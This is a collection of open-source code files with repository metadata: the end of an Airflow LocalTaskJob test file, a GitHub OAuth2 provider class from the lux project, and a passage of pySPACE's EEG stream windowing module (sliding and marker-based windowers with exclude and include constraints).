self.assertEqual(ti.state, State.FAILED)
self.assertTrue(data['called'])
self.assertNotIn('reached_end_of_sleep', data,
'Task should not have been allowed to run to completion')
@pytest.mark.quarantined
def test_mark_success_on_success_callback(self):
"""
Test that ensures that when a task is marked as success in the UI
on_success_callback gets executed
"""
data = {'called': False}
def success_callback(context):
self.assertEqual(context['dag_run'].dag_id,
'test_mark_success')
data['called'] = True
dag = DAG(dag_id='test_mark_success',
start_date=DEFAULT_DATE,
default_args={'owner': 'owner1'})
task = DummyOperator(
task_id='test_state_succeeded1',
dag=dag,
on_success_callback=success_callback)
session = settings.Session()
dag.clear()
dag.create_dagrun(run_id="test",
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti = TaskInstance(task=task, execution_date=DEFAULT_DATE)
ti.refresh_from_db()
job1 = LocalTaskJob(task_instance=ti,
ignore_ti_state=True,
executor=SequentialExecutor())
from airflow.task.task_runner.standard_task_runner import StandardTaskRunner
job1.task_runner = StandardTaskRunner(job1)
process = multiprocessing.Process(target=job1.run)
process.start()
ti.refresh_from_db()
for _ in range(0, 50):
if ti.state == State.RUNNING:
break
time.sleep(0.1)
ti.refresh_from_db()
self.assertEqual(State.RUNNING, ti.state)
ti.state = State.SUCCESS
session.merge(ti)
session.commit()
job1.heartbeat_callback(session=None)
self.assertTrue(data['called'])
process.join(timeout=10)
self.assertFalse(process.is_alive())
@pytest.fixture()
def clean_db_helper():
yield
clear_db_runs()
@pytest.mark.usefixtures("clean_db_helper")
class TestLocalTaskJobPerformance:
@pytest.mark.parametrize("return_codes", [[0], 9 * [None] + [0]]) # type: ignore
@mock.patch("airflow.jobs.local_task_job.get_task_runner")
def test_number_of_queries_single_loop(self, mock_get_task_runner, return_codes):
unique_prefix = str(uuid.uuid4())
dag = DAG(dag_id=f'{unique_prefix}_test_number_of_queries', start_date=DEFAULT_DATE)
task = DummyOperator(task_id='test_state_succeeded1', dag=dag)
dag.clear()
dag.create_dagrun(run_id=unique_prefix, state=State.NONE)
ti = TaskInstance(task=task, execution_date=DEFAULT_DATE)
mock_get_task_runner.return_value.return_code.side_effect = return_codes
job = LocalTaskJob(task_instance=ti, executor=MockExecutor())
with assert_queries_count(12):
job.run()
| {
"content_hash": "2a06bbb6b5b3d76d0ac68355fdeeb8c1",
"timestamp": "",
"source": "github",
"line_count": 420,
"max_line_length": 105,
"avg_line_length": 37.36666666666667,
"alnum_prop": 0.5825793296801325,
"repo_name": "wooga/airflow",
"id": "2d91efe32d92e7d21ca045fe197b0039c3db4a28",
"size": "16483",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/jobs/test_local_task_job.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "12126"
},
{
"name": "Dockerfile",
"bytes": "4084"
},
{
"name": "HTML",
"bytes": "128446"
},
{
"name": "JavaScript",
"bytes": "22118"
},
{
"name": "Mako",
"bytes": "1284"
},
{
"name": "Python",
"bytes": "5879650"
},
{
"name": "Shell",
"bytes": "41820"
}
],
"symlink_target": ""
} |
from ..oauth import OAuth2, register_oauth
@register_oauth
class Github(OAuth2):
'''Github API
https://developer.github.com/v3/
'''
auth_uri = 'https://github.com/login/oauth/authorize'
token_uri = 'https://github.com/login/oauth/access_token'
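# A sketch of how another provider could plausibly be registered with the same
# pattern; the class name and URIs below are hypothetical, and only the two
# attributes shown above (auth_uri, token_uri) are assumed to be required.
#
# @register_oauth
# class ExampleProvider(OAuth2):
#     '''Hypothetical OAuth2 provider following the pattern above.'''
#     auth_uri = 'https://provider.example/oauth/authorize'
#     token_uri = 'https://provider.example/oauth/token'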
| {
"content_hash": "fa416e8bd5c9dee119898cca92be881d",
"timestamp": "",
"source": "github",
"line_count": 11,
"max_line_length": 61,
"avg_line_length": 24.272727272727273,
"alnum_prop": 0.6779026217228464,
"repo_name": "tazo90/lux",
"id": "47cfe4a1b2d73128570364737735530021e41961",
"size": "267",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "lux/extensions/oauth/github/__init__.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "85029"
},
{
"name": "HTML",
"bytes": "17331"
},
{
"name": "JavaScript",
"bytes": "354892"
},
{
"name": "Python",
"bytes": "543161"
}
],
"symlink_target": ""
} |
""" Performs windowing of incoming stream and produces instances of fixed
length for preprocessing and classification.
The :class:`~pySPACE.missions.support.windower.SlidingWindower` class performs
windowing for the online setting where no markers are available.
The :class:`~pySPACE.missions.support.windower.MarkerWindower` class extracts
windows according to definitions like the presence or non-presence of markers.
Additionally, exclude conditions can be defined that exclude certain markers in
proximity to extracted events.
The :class:`~pySPACE.missions.support.windower.WindowFactory` loads a windowing
specification from a yaml file. The window definitions are then stored in a
dictionary which is then used by one of the Windowers
(:class:`~pySPACE.missions.support.windower.MarkerWindower`,
:class:`~pySPACE.missions.support.windower.SlidingWindower` etc.) to cut the
incoming data stream.
The Windower definition is always application specific and can contain many
keys/values. In order to construct your own windower definition see the short
explanation in :class:`~pySPACE.missions.support.windower.MarkerWindower`.
Time is always measured in ms.
If there are mistakes in time, this should be because of
unknown block size or frequency.
Additionally include conditions can be added to ensure the presence of certain
markers in a specific range. So 'or' conditions between the conditions are
reached by repeating the definitions of the marker with different exclude or
include definitions and 'and' conditions are simply reached by concatenation.
Negation is now possible by switching to the other kind of condition.
:Author: Timo Duchrow
:Created: 2008/08/29
:modified: Mario Michael Krell (include and exclude defs)
"""
__version__ = "$Revision: 451 $"
# __all__ = ['SlidingWindower, MarkerWindower, ExcludeDef, LabeledWindowDef']
import sys
import os
import numpy
import math
import yaml
from pySPACE.resources.data_types.time_series import TimeSeries
if __name__ == '__main__':
import unittest
debug = False
warnings = False
# debug = True
# warnings = True
class Windower(object):
"""Windower base class"""
def __init__(self, data_client):
self.data_client = data_client
if debug:
print("acquisition frequency:\t %d Hz"% data_client.dSamplingInterval)
print("server block size:\t %d samples"% data_client.stdblocksize)
def _mstosamples(self, ms):
"""Convert from milliseconds to number of samples based on the
parameters of data_client."""
if self.data_client.dSamplingInterval is None:
raise Exception, "data_client needs to be connected to determine "\
"acquisition frequency"
nsamples = ms * self.data_client.dSamplingInterval / 1000.0
if nsamples != int(nsamples):
import warnings
warnings.warn(" %s ms can not be converted to int number"\
" of samples with current sampling frequency (%s Hz)" \
% (ms, self.data_client.dSamplingInterval))
# since the current float representation is not equal to int, round
nsamples = round(nsamples)
return int(nsamples)
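# Worked example (25 Hz is an assumed value of dSamplingInterval): 1280 ms
# maps to 1280 * 25 / 1000 = 32 samples, and _samplestoms(32) below yields
# 1280.0 ms again, so the two helpers are exact inverses for such values.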
def _samplestoms(self, samples):
"""Convert from number of samples to milliseconds based on the
parameters of data_client."""
if self.data_client.dSamplingInterval is None:
raise Exception, "data_client needs to be connected to determine "\
"acquisition frequency"
ms = samples * 1000.0 / self.data_client.dSamplingInterval
return ms
@classmethod
def _load_window_spec(cls, windower_spec="", local_window_conf=False):
"""
Load the window definitions to extract the labeled samples
**Parameters**
:windower_spec:
file name of the windower specification
(*optional, default:`default_windower_spec`*)
:local_window_conf:
Windower file is looked up in the local directory if set True.
.. note: As default the spec_dir from `pySPACE.configuration`
is used to look up spec files.
Otherwise it is looked up in the subdirectory `windower` in
`node_chains` in the `spec_dir`, which is the better way of
using it.
(*optional, default: False*)
"""
if windower_spec == "":
window_definitions = WindowFactory.default_windower_spec()
return window_definitions
if type(windower_spec) == dict:
return WindowFactory.create_window_defs(windower_spec)
# check for 'yaml'-ending of the file
if ".yaml" not in windower_spec: # general substring search!
windower_spec = windower_spec + ".yaml"
if local_window_conf:
if windower_spec.count('/')==0:
#windows file should be in local directory
windower_spec_file_path = "./" + windower_spec
else:
#windower spec contains complete path
windower_spec_file_path = windower_spec
else:
import pySPACE
windower_spec_file_path = os.path.join(pySPACE.configuration.spec_dir,
"node_chains","windower",
windower_spec)
if os.path.exists(windower_spec_file_path):
windower_spec_file = open(windower_spec_file_path, 'r')
window_definitions = \
WindowFactory.window_definitions_from_yaml(windower_spec_file)
windower_spec_file.close()
else:
raise IOError('Windower: Windowing spec file '
+ windower_spec_file_path + ' not found!')
return window_definitions
class SlidingWindower(Windower):
"""An iterable class that produces sliding windows for online classification."""
def __init__(self, data_client, windowsizems=1000, stridems=100, underfull=False):
super(SlidingWindower, self).__init__(data_client)
# register sliding windower as consumer of EEG stream client
data_client.regcallback(self._addblock)
# convert intervals in ms to number of samples
self.stridems = stridems
self.stride = self._mstosamples(stridems)
self.windowsizems = windowsizems
self.windowsize = self._mstosamples(windowsizems)
self.underfull = underfull
if self.windowsizems % self.stridems != 0:
raise Exception, "window size needs to be a multiple of stride"
if self.stride % data_client.stdblocksize != 0:
raise Exception, "stride needs to be a multiple of blocksize " \
"(server is sending block size %d)" % data_client.stdblocksize
# NB: the acquisition frequency is mistakenly called ``sampling interval''
# in the Brain Products protocol.
# calculate number of required blocks
self.buflen = int(self.windowsize / data_client.stdblocksize)
# init to ring buffers, one for the samples, one for the markers
self.samplebuf = RingBuffer(self.buflen)
self.markerbuf = RingBuffer(self.buflen)
# determine how many blocks need to be read at once with client
self.readsize = self.stride / data_client.stdblocksize
if debug:
print("buflen:\t %d" % self.buflen)
print("readsize:\t %d" % self.readsize)
def __iter__(self):
return self
def next(self):
"""Retrieve the next window according to windowsize and stride."""
nread = 0 # number of blocks actually read
if len(self.samplebuf) == 0:
# the ring buffer is still completely empty, fill it
nread = self.data_client.read(nblocks=self.buflen)
if nread < self.buflen:
raise StopIteration
else:
# just replace required number of blocks
nread = self.data_client.read(nblocks=self.readsize)
if nread < self.readsize:
raise StopIteration
# copy ring buffer into one long array
ndsamplewin = numpy.hstack(self.samplebuf.get())
ndmarkerwin = numpy.hstack(self.markerbuf.get())
return (ndsamplewin, ndmarkerwin)
def _addblock(self, ndsamples, ndmarkers):
"""Add incoming data block to ring buffers"""
self.samplebuf.append(ndsamples)
self.markerbuf.append(ndmarkers)
class MarkerWindower(Windower):
"""returns (<numpy.ndarray> window, <str> class)
MarkerWindower maintains a ring buffer for incoming sample blocks. The
buffer is divided into three segments:
Example::
t0 t1 t3 t4 <---
+---------+---------+---------+---------+---------+---------+---------+
| block 1 | block 2 | block 3 | block 4 | block 5 | block 6 | block 7 |
+---------+---------+---------+---------+---------+---------+---------+
|< prebuflen = 3 >| |< postbuflen = 3 >|
[////////////////////////////][---------][/////////////////////////////]
history ``current'' lookahead
__________
scan
MarkerWindower scans incoming blocks for markers as they come in (block 7 in
the example). When a block passes into the ``current`` section, all windows
that meet the constraints are extracted. To accomplish this, prebuflen
and postbuflen have been calculated so that the buffer enables extraction
of sufficient window lengths for all window definitions as well as
lookaheads.
A windowdef looks like:
.. code-block:: yaml
startmarker : "S 8"
endmarker : "S 9"
skip_ranges :
- {start : 0, end: 300000}
window_defs :
s16:
classname : LRP
markername : "S 16"
startoffsetms : -1280
endoffsetms : 0
excludedefs : []
includedefs : [immediate_response]
null:
classname : NoLRP
markername : "null"
startoffsetms : -1280
endoffsetms : 0
excludedefs : [all]
exclude_defs:
all:
markernames : ["S 1", "S 2", "S 8", "S 16", "S 32"]
preexcludems : 2000
postexcludems : 2000
include_defs:
immediate_response:
markernames : ["S 32"]
preincludems: -200
postincludems: 1200
**Parameters**
:startmarker: name of the marker where at the earliest cutting begins
:endmarker: name of the marker where at the latest cutting ends
:skip_ranges: Not completely implemented!
The 'end' component results in
the parameter skipfirstms, which tells
the windower which time points to skip
at the beginning.
.. todo:: Change parameterization or code.
:window_def: includes names of definitions of window cuts
:classname: name of the label given to the window, when cut
:markername: name of the marker being in the 'current block'.
MUST BE A STRING!
.. note:: The ``null`` marker is a synthetic marker,
which is internally added to the stream
every *nullmarker_stride_ms* milliseconds.
Currently, this parameter has to be set
separately and is 1000ms by default.
:startoffsetms: start of the window relative to the marker in the 'current block'
:endoffsetms: end of the window relative to the marker in the 'current block'
:jitter: Not implemented! It was intended to add
artificial jitter during the segmentation.
.. todo:: Delete completely!
:exclude_defs: excludes each marker in markernames defined by the interval
'[-preexcludems, postexcludems]' relative to the window
marker lying at zero
:preexcludems: time before the window marker, where the exclude markers
are forbidden. This time can be chosen negative.
:postexcludems: time after the window marker, where the exclude markers
are forbidden. This time can be chosen negative.
:include_defs: everything is the same as for the exclude defs, except
that one of the specified markers has to lie in the
interval.
Time is always measured in ms.
If timing errors occur, they are most likely caused by an unknown block
size or sampling frequency.
**Class Parameters**
:data_client: Client, delivering the data
:windowdefs:
List of window definitions generated by
:func:`WindowFactory.create_window_defs`
(*optional, default: None*)
:debug: Enable debug print outs to command line
(*optional, default: False*)
:nullmarker_stride_ms:
Set artificial markers with this constant distance into the stream
with the Name "null". If this parameter is set to *None*,
no artificial markers are generated.
(*optional, default: 1000*)
:no_overlap:
Ignore the last sample in each window (important for streaming data)
(*optional, default: False*)
:data_consistency_check:
Currently it is only checked that the standard deviation is not 0
(*optional, default: False*)
"""
# ==================
# = Initialization =
# ==================
def __init__(self, data_client, windowdefs=None, debug=False,
nullmarker_stride_ms=1000, no_overlap=False,
data_consistency_check=False):
super(MarkerWindower, self).__init__(data_client)
self.data_client = data_client
data_client.regcallback(self._addblock)
self.windowdefs = windowdefs
# Key errors caused by missing markers are collected to deliver
# just one warning. The treatment differs by usage: missing window
# markers deliver no window, excludedefs just ignore the key error and
# includedefs would also deliver no window, because the includedef can
# not be fulfilled if the marker can not be found.
self.keyerror = {}
# flags that indicate if we passed specified start and stop markers
self.start = False
self.end = False
# determines the minimal marker offset for a window to be cut out
# this is changed when the start marker and the window marker are in
# the same block
self.min_markeroffset = 0
# occurrence of marker of a specific type in the buffer
self.buffermarkers = dict()
self.nullmarker_id = 0
self.nullmarker_stride = None
if nullmarker_stride_ms is not None:
self.nullmarker_stride = self._mstosamples(nullmarker_stride_ms)
self.buffermarkers["null"] = list()
self.next_nullmarker = 0 # number of samples to go until next
# nullmarker
self.nsamples_postscan = 0 # number of samples after extraction point
self.nsamples_prescan = 0 # number of samples before extraction point
self.nmarkers_prescan = 0 # max time markers should be remembered
# important for reduced buffermarkers
# nmarkers_postscan is equivalent to nsamples_postscan
if debug:
for wdef in windowdefs:
print wdef
# determine maximum extents of buffers and maximum time that markers
# should be remembered
(nsamples_prescan, nsamples_postscan, nsamples_max_premarkers) = \
self._max_scan_ranges()
self.nsamples_prescan = nsamples_prescan
self.nsamples_postscan = nsamples_postscan
self.nmarkers_prescan = nsamples_max_premarkers
if debug:
print " nsamples_prescan", nsamples_prescan
print " nsamples_postscan", nsamples_postscan
# calculate buffer length in terms of std blocksize
self.prebuflen = int(math.ceil(float(nsamples_prescan)/ \
data_client.stdblocksize))
self.postbuflen = int(math.ceil(float(nsamples_postscan)/ \
data_client.stdblocksize))
# + one middle block (the ``current'' block)
self.buflen = self.prebuflen + 1 + self.postbuflen
if debug:
print " stdblocksize", data_client.stdblocksize
print " prebuflen", self.prebuflen
print " postbuflen", self.postbuflen
print " buflen", self.buflen
print
# initialize the buffers
self.samplebuf = RingBuffer(self.buflen)
self.markerbuf = RingBuffer(self.buflen)
# determine the offset of the first sample in the incoming block
self.incoming_block_offset = self.postbuflen*self.data_client.stdblocksize
# the list of the markers in the current block that have not yet been
# handled (by calling the next() method of the iterator protocol)
self.cur_extract_windows = list()
# total number of blocks read
self.nblocks_read_total = 0
# additional parameters, e.g. security checks etc
self.data_consistency_check = data_consistency_check
self.no_overlap = no_overlap
if debug:
print(" extracting windows with %soverlap" % ("No " if self.no_overlap else ""))
def _max_scan_ranges(self):
"""Scan window and constraint definitions to determine maximum extent
of buffer for markers and for samples. Return (max_prescan_samples,
max_postscan_samples, max_prescan_markers)"""
# number of samples before and after extraction point that needs to
# be available at all times, always positive
nsamples_prescan = 0
nsamples_postscan = 0
# either positive or negative offset as in window definition
nsamples_prewin = 0
nsamples_postwin = 0
# determine size of pre and post buffer to accommodate all window
# definitions
for wdef in self.windowdefs:
if wdef.startoffsetms > wdef.endoffsetms:
raise Exception, "illegal window definition: "\
"startoffset needs to be smaller then endoffset."
nsamples_prewin = min(nsamples_prewin,
self._mstosamples(wdef.startoffsetms))
nsamples_postwin = max(nsamples_postwin,
self._mstosamples(wdef.endoffsetms))
# TODO: If-clauses may be dropped or replaced by asserts:
# adjust pre-buffer length
if nsamples_prewin < 0:
nsamples_prescan = abs(nsamples_prewin)
else:
nsamples_prescan = 0
# end of window is always later than start
if nsamples_postwin < 0:
nsamples_postscan = 0
else:
nsamples_postscan = nsamples_postwin
nmarkers_prescan = nsamples_prescan
# For the adaptions on the excludedefs and includedefs just the marker
# are relevant and not the samples (nmarkers_prescan).
# extend lookahead (nsamples_postscan) and nmarkers_prescan to cover
# excludes ...
for wdef in self.windowdefs:
if wdef.excludedefs is not None:
for exc in wdef.excludedefs:
nsamples_postscan = max(nsamples_postscan,
self._mstosamples(exc.postexcludems))
nmarkers_prescan = max(nmarkers_prescan,
self._mstosamples(exc.preexcludems))
#...and includes in the same range.
if wdef.includedefs is not None:
for inc in wdef.includedefs:
nsamples_postscan = max(nsamples_postscan,
self._mstosamples(inc.postincludems))
nmarkers_prescan = max(nmarkers_prescan,
self._mstosamples(inc.preincludems))
return (int(nsamples_prescan), int(nsamples_postscan),
int(nmarkers_prescan))
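# Worked example, using the YAML spec from the class docstring and an assumed
# 25 Hz acquisition rate: both window defs span [-1280 ms, 0 ms], so
# nsamples_prescan = 32 and the window end contributes no lookahead; the "all"
# exclude def (pre/post 2000 ms = 50 samples) then raises nsamples_postscan
# and nmarkers_prescan to 50, i.e. the method returns (32, 50, 50).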
# ===============================
# = Handling of incoming blocks =
# ===============================
def _decmarkeroffsets(self):
"""Decrement all offsets for markers in buffer as new blocks come in."""
markers = self.buffermarkers.keys()
# decrement of marker offsets in buffer
for marker in markers:
# remove old markers that are out of scope
new_offsets = [x - self.data_client.stdblocksize
for x in self.buffermarkers[marker]
if x -self.data_client.stdblocksize >= (-1)*self.nmarkers_prescan
]
if len(new_offsets) == 0:
del self.buffermarkers[marker]
else:
self.buffermarkers[marker] = new_offsets
def _addblock(self, ndsamples, ndmarkers):
"""Add incoming block to ring buffer."""
self.nblocks_read_total += 1 # increment total number of blocks
self._decmarkeroffsets() # adjust marker offsets
self.samplebuf.append(ndsamples)
self.markerbuf.append(ndmarkers)
self._insertnullmarkers() # insert null markers
self._scanmarkers(ndmarkers) # scan for new markers
def _insertnullmarkers(self, debug=False):
"""Insert epsilon markers according to nullmarker stride."""
if self.nullmarker_stride is None:
return
if debug:
print "next_nullmarker", self.next_nullmarker
self.nullmarker_id = self.data_client.markerids["null"]
while self.next_nullmarker < self.data_client.stdblocksize:
if not self.buffermarkers.has_key(self.nullmarker_id):
self.buffermarkers[self.nullmarker_id] = list()
self.buffermarkers[self.nullmarker_id].append(
self.incoming_block_offset + self.next_nullmarker)
if debug:
print "inserting", \
self.incoming_block_offset + self.next_nullmarker
self.next_nullmarker += self.nullmarker_stride
self.next_nullmarker -= self.data_client.stdblocksize
def _scanmarkers(self, ndmarkers, debug=False):
"""Scan incoming block for markers.
self.buffermarkers contains offsets of markers w.r.t. the ``current``
block @ position 0
"""
for i, marker in enumerate(ndmarkers):
if marker != -1:
if self.buffermarkers.has_key(marker):
self.buffermarkers[marker].append(
self.incoming_block_offset + i)
else:
self.buffermarkers[marker]= [self.incoming_block_offset + i]
if debug:
print " scanmarkers ", self.buffermarkers
# ================================
# = Iteration protocol interface =
# ================================
def __iter__(self):
self.nwindow=0
return self
def next(self, debug=False):
"""Return next labeled window when used in iterator context."""
while len(self.cur_extract_windows) == 0:
# fetch the next block from data_client
if debug:
print "reading next block"
self._readnextblock()
self._extract_windows_cur_block()
if debug:
print " buffermarkers", self.buffermarkers
print " current block", self.samplebuf.get()[self.prebuflen][1,:]
# print " current extracted windows ", self.cur_extract_windows
(windef_name, current_window, class_, start_time, end_time, markers_cur_win) = \
self.cur_extract_windows.pop(0)
# TODO: Replace this by a decorator or something similar
current_window = numpy.atleast_2d(current_window.transpose())
current_window = TimeSeries(
input_array=current_window,
channel_names=self.data_client.channelNames,
sampling_frequency=self.data_client.dSamplingInterval,
start_time = start_time,
end_time = end_time,
name = "Window extracted @ %d ms, length %d ms, class %s" % \
(start_time, end_time - start_time, class_),
marker_name = markers_cur_win
)
current_window.generate_meta()
current_window.specs['sampling_frequency'] = self.data_client.dSamplingInterval
current_window.specs['wdef_name'] = windef_name
self.nwindow += 1
# return (ndsamplewin, ndmarkerwin)
return (current_window, class_)
def _readnextblock(self):
"""Read next block from EEG stream client."""
nread = 0 # number of blocks actually read
if len(self.samplebuf) == 0:
# fill ring buffer
nread = self.data_client.read(nblocks=self.buflen)
if nread < self.buflen:
raise StopIteration
for marker_id, offsets in self.buffermarkers.iteritems():
for offset in offsets:
if offset < 0 and warnings:
print >>sys.stderr, "warning: markers ignored when "\
"initializing buffer"
else:
# read the next block
nread = self.data_client.read()
if nread == 0:
raise StopIteration
def _extract_windows_cur_block(self):
"""Add windows for markers in current block to self.cur_extract_windows."""
for wdef in self.windowdefs:
# resolve to id
# if id does not exist ignore this window definition and go on
try:
markerid = self.data_client.markerids[wdef.markername]
except KeyError, e:
e=str(e)
if not self.keyerror.has_key(e):
self.keyerror[e]=wdef
print
print "windowdef warning: Marker ", e, "not found in the"
print self.keyerror[e]
continue
# if there exist a startmarker in the wdef resolve to id
if wdef.startmarker != None:
try:
startid = self.data_client.markerids[wdef.startmarker]
except KeyError, e:
e=str(e)
if not self.keyerror.has_key(e):
self.keyerror[e]=wdef
print
print "windowdef warning: Startmarker ", e, "not found in the"
print self.keyerror[e]
continue
# check if startmarker id has been seen in current buffer scope
if self.buffermarkers.has_key(startid) and \
self.buffermarkers[startid][0] < self.data_client.stdblocksize:
# if the startmarker is found we delete it from the window
# definition because from now on windows can be cut
wdef.startmarker = None
                    # in addition a start flag is set and the minimum marker
                    # offset for markers in the current block is stored
self.start = True
self.min_markeroffset = self.buffermarkers[startid][0]
else:
continue
# check if corresponding marker id has been seen in current
# buffer scope or if the stopmarker is already True
if not self.buffermarkers.has_key(markerid) or self.end==True:
continue
# now prepare extraction windows for markers in the ``current'' block
# check if includedefs and excludedefs are fulfilled
for markeroffset in self.buffermarkers[markerid]:
if self.min_markeroffset <= markeroffset < self.data_client.stdblocksize and \
self._check_exclude_defs_ok(markeroffset, wdef.excludedefs) and \
self._check_include_defs_ok(markeroffset, wdef.includedefs):
try:
(extractwindow, start_time, end_time, markers_cur_win) = \
self._extractwindow(
markeroffset,
self._mstosamples(wdef.startoffsetms),
self._mstosamples(wdef.endoffsetms))
if self.data_consistency_check:
# test if extracted window has std zero
std = numpy.std(extractwindow,axis=1)
if sum(std < 10**-9): #can be considered as zero
# filter the channel names where std equals zero
zero_channels = [self.data_client.channelNames[index]
for (index,elem) in enumerate(std)
if elem < 10**-9]
print "Warning: Standard deviation of channel(s) " \
" %s in time interval [%.1f,%.1f] is zero!" \
% (str(zero_channels), start_time, end_time)
if wdef.skipfirstms is None or \
start_time > wdef.skipfirstms:
self.cur_extract_windows.append((wdef.windef_name,
extractwindow, wdef.classname, start_time,
end_time, markers_cur_win))
except MarkerWindowerException, e:
if warnings:
print >>sys.stderr, "warning:", e
# if this was the first window, adjust min_markeroffset before we
# move to the next block
if self.start:
self.min_markeroffset = 0
self.start = False
# check if the end of the stream is reached
if wdef.endmarker != None:
try:
endid = self.data_client.markerids[wdef.endmarker]
except KeyError, e:
e=str(e)
if not self.keyerror.has_key(e):
self.keyerror[e]=wdef
print
print "windowdef warning: Endmarker ", e, "not found in the"
print self.keyerror[e]
continue
# check if endmarker id has been seen in current buffer scope
if self.buffermarkers.has_key(endid):
if self.buffermarkers[endid][0] < 0 and not self.end:
# if the endmarker is reached we set the end-flag for window
# cutting to True
self.end = True
print "Endmarker found!"
raise StopIteration
def _check_exclude_defs_ok(self, markeroffset, excludedefs):
""" Check whether the exclude definitions match
        .. note::
            Changes in this section also need to be checked
            in the following _check_include_defs_ok method,
            because the two are very similar.
"""
# Nothing to do if there are no excludedefs
if excludedefs is None or len(excludedefs)==0:
return True
# Check each exclude definition
for exc in excludedefs:
preexclude = markeroffset - self._mstosamples(exc.preexcludems)
if self.no_overlap:
postexclude = markeroffset + self._mstosamples(exc.postexcludems)
else:
postexclude = markeroffset + 1 + self._mstosamples(exc.postexcludems)
# Get markerid and skip if it does not exist.
try:
excmarkerid = self.data_client.markerids[exc.markername]
except KeyError, e:
e=str(e)
if not self.keyerror.has_key(e):
self.keyerror[e]=exc
print
print "exclude warning: Marker ", e, "not found in the ..."
print self.keyerror[e]
continue
# Skip if no proximal exclude marker seen
if not self.buffermarkers.has_key(excmarkerid):
continue
# Not ok, if exclude marker falls into exclude range
# This is the important part of this check!
# Question: Why not exc_marker <=postexclude or exc_marker > preexclude?
# Answer: Before one added
for exc_marker in self.buffermarkers[excmarkerid]:
                # The inequality lets you exclude the same marker
                # only a few seconds before or after the current marker,
                # to deal with unwanted marker repetitions.
if preexclude <= exc_marker < postexclude and \
exc_marker != markeroffset:
return False
return True #if all excludedefs are fulfilled
def _check_include_defs_ok(self, markeroffset, includedefs):
"""Check whether all the include definitions match"""
#Code adapted from the previous exclude-check
#Checks if there are includedefs
if includedefs is None or len(includedefs)==0:
return True
# Check each include definition
for inc in includedefs:
preinclude = markeroffset - self._mstosamples(inc.preincludems)
if self.no_overlap:
postinclude = markeroffset + self._mstosamples(inc.postincludems)
else:
postinclude = markeroffset + 1 + self._mstosamples(inc.postincludems)
            # The check always breaks if the necessary marker does not exist.
try:
incmarkerid = self.data_client.markerids[inc.markername]
except KeyError, e:
e=str(e)
if not self.keyerror.has_key(e):
self.keyerror[e]=inc
print
print "include warning: Marker ", e, "not found in the ..."
print self.keyerror[e]
return False
            # Break if no proximal include marker seen (different from exclude,
            # because include markers need to be proximal).
if not self.buffermarkers.has_key(incmarkerid):
return False
# Not ok, if no include marker falls into include range
# It is important to remark that no includedefs using the current
# marker are allowed!
check = False # remembers if a check succeeded
for inc_marker in self.buffermarkers[incmarkerid]:
                # inequality to allow using the same marker name for the include def
if preinclude <= inc_marker < postinclude and \
inc_marker != markeroffset:
check = True
if not check:
return False
return True # If all includedefs are fulfilled
def _extractwindow(self, cur_sample_block_offset, start_offset, end_offset,
debug=False):
""" Extracts a sample window from the ring buffer and consolidates it
into a single numpy array object."""
# calculate current position with respect to prebuffer start
cur_sample_buf_offset = self.prebuflen * self.data_client.stdblocksize \
+ cur_sample_block_offset
buf_extract_start = cur_sample_buf_offset + start_offset
if self.no_overlap:
buf_extract_end = cur_sample_buf_offset + end_offset
else:
buf_extract_end = cur_sample_buf_offset + 1 + end_offset
if debug:
print "buf_extract_start", buf_extract_start
print "buf_extract_end", buf_extract_end
if buf_extract_start < 0:
raise MarkerWindowerException,"not enough history data available" \
" to extract window with start offset of %d samples" \
% start_offset
assert buf_extract_end >= 0
assert buf_extract_end <= self.buflen * self.data_client.stdblocksize
end_time_samples = \
(self.nblocks_read_total * self.data_client.stdblocksize) - \
(self.buflen * self.data_client.stdblocksize - buf_extract_end)
end_time = self._samplestoms(end_time_samples)
start_time_samples = end_time_samples - \
(buf_extract_end - buf_extract_start) + 1
start_time = self._samplestoms(start_time_samples)
# copy ring buffer into one long array and extract subwindow
ndsamplewin = numpy.hstack(self.samplebuf.get())[:,buf_extract_start:buf_extract_end]
markers_cur_window = self._extract_markers_cur_window(buf_extract_start, buf_extract_end)
return (ndsamplewin, start_time, end_time, markers_cur_window)
def _extract_markers_cur_window(self, buf_extract_start, buf_extract_end):
""" Filter out all markers that lie in the current window
to store this information. The markers are stored with their clear name
and temporal offset.
"""
markers_cur_window = dict()
for marker_id in self.buffermarkers:
for offset in self.buffermarkers[marker_id]:
if offset >= 0 \
and buf_extract_start <= offset < buf_extract_end \
and marker_id != self.nullmarker_id:
marker = self.data_client.markerNames[marker_id]
if not markers_cur_window.has_key(marker):
markers_cur_window[marker] = list()
markers_cur_window[marker].append(self._samplestoms(offset-buf_extract_start))
return markers_cur_window
# =====================
# = Exception classes =
# =====================
class MarkerWindowerException(Exception):
def __init__(self, arg):
super(MarkerWindowerException, self).__init__(arg)
# ==================================================
# = Support classes for definitions of constraints =
# ==================================================
class LabeledWindowDef(object):
"""Labeled window definition that is to be extracted from EEG stream."""
def __init__(self, windef_name, classname, markername, startoffsetms,
endoffsetms, excludedefs=None,includedefs=None,
skipfirstms=None, jitter=None,startmarker=None,endmarker=None):
super(LabeledWindowDef, self).__init__()
self.windef_name = windef_name
self.classname = classname
self.markername = markername # can be None
self.excludedefs = excludedefs
self.includedefs = includedefs
self.startoffsetms = startoffsetms
self.endoffsetms = endoffsetms
self.skipfirstms = skipfirstms
self.startmarker = startmarker
self.endmarker = endmarker
def __str__(self):
d = {'wdef' : self.windef_name, 'cls' : self.classname,
'skip_first' : self.skipfirstms, 'marker' : self.markername,
'start' : self.startoffsetms, 'end' : self.endoffsetms}
if d['marker'] == '':
d['marker'] = "''"
str_ = 'LabeledWindowDef %(wdef)s\n class: %(cls)s\n skip first: '\
'%(skip_first)s\n marker: %(marker)s\n start: %(start)d ms\n'\
' end: %(end)d ms\n' % d
# append exclude definitions if any
if self.excludedefs:
for exc in self.excludedefs:
for line in str(exc).splitlines():
str_ += " %s\n" % line
# append include definitions if any
if self.includedefs:
for inc in self.includedefs:
for line in str(inc).splitlines():
str_ += " %s\n" % line
return str_
class ExcludeDef(object):
"""Definition of exclude constraints for window extraction."""
def __init__(self, markername, preexcludems, postexcludems):
super(ExcludeDef, self).__init__()
self.markername = markername
self.preexcludems = preexcludems
self.postexcludems = postexcludems
def __str__(self):
d = {'name' : self.markername, 'pre' : self.preexcludems,
'post' : self.postexcludems}
